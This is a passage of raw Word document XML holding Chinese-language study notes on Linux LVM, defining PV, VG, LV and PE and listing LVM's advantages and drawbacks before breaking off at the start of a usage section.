        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、物理卷</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PV</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Physical Volume)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A863E9A" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个可供存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的块设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如硬盘分区（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的硬盘、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RAID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一个回环文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个被内核映射的设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dm-crypt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它包含一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头，它是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建的实际硬件或存储系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C695F" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0329AB" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、卷组</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VG</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Volume Group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10625BE4" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>卷组是对一个或多个物理卷的集合，并在设备文件系统中显示为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/VG_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286BFA58" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516FC481" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、逻辑卷</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LV</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Logical Volume)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D26E17" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑卷是可供系统使用的最终元设备，它们在卷组中创建和管理，由物理块组成，实际上就是一个虚拟分区，并显示为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/VG_NAME/LV_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常在其上可以创建文件系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED65167" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFDCF96" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、物理块</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Physical Extends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A116803" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个卷组中最小的连续区域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4 MiB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，多个物理块将被分配给一个逻辑卷。你可以把它看成物理卷的一部分，这部分可以被分配给一个逻辑卷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D00F9B" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0A652E" w14:textId="48C86EEE" w:rsidR="00CE3C9B" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面我画了一张</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘管理中的位置图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A641792" w14:textId="2766D7DD" w:rsidR="00CE3C9B" w:rsidRDefault="000F63B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="222F9389" wp14:editId="081293FA">
            <wp:extent cx="5274310" cy="6851015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="23538206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2067" name="图片 1" descr="图示&#10;&#10;描述已自动生成"/>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6851015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF69E6" w14:textId="77777777" w:rsidR="00CE3C9B" w:rsidRDefault="00CE3C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251626C9" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的优缺点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDABAF2" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、优点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B42AC28" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比起传统的硬盘分区管理方式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更富于灵活性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D356FE" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BD2DA8" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将多块硬盘看作一块大硬盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D68A4" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用逻辑卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），可以创建跨越众多硬盘空间的分区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4108D" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以创建小的逻辑卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在空间不足时再动态调整它的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462BDB2C" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调整逻辑卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）大小时可以不用考虑逻辑卷在硬盘上的位置，不用担心没有可用的连续空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83FAD5" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在线（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）对逻辑卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和卷组（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）进行创建、删除、调整大小等操作。不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的文件系统也需要重新调整大小，好在某些文件系统（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ext4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）也支持在线操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A7AAC" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无需重新启动服务，就可以将服务中用到的逻辑卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在线（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）迁移至别的硬盘上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80E24A" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许创建快照，可以保存文件系统的备份，同时使服务的下线时间（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>downtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）降低到最小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A760781" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持各种设备映射目标（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>device-mapper targets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），包括透明文件系统加密和缓存常用数据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>caching of frequently used data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。这将允许你创建一个包含一个或多个磁盘、并用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LUKS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密的系统，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LVM on top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可轻松地管理和调整这些独立的加密卷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. /, /home, /backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并免去开机时多次输入密钥的麻烦。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A9270" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、缺点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0C3D4" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统设置时需要更复杂的额外步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378580A5" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统并不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，若使用双系统，你将无法在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5119C" w14:textId="3947678A" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133009C" w14:textId="1291E180" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidRPr="002370FF">
        <w:t>https://blog.csdn.net/weixin_42915431/article/details/121881054</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7821B6" w14:textId="77777777" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2F5355" w14:textId="3C7BA961" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概就是，先对多余磁盘分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E2717" w14:textId="48F618C0" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块，相关命令有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B010F" w14:textId="09C341E5" w:rsidR="002370FF" w:rsidRDefault="002370FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
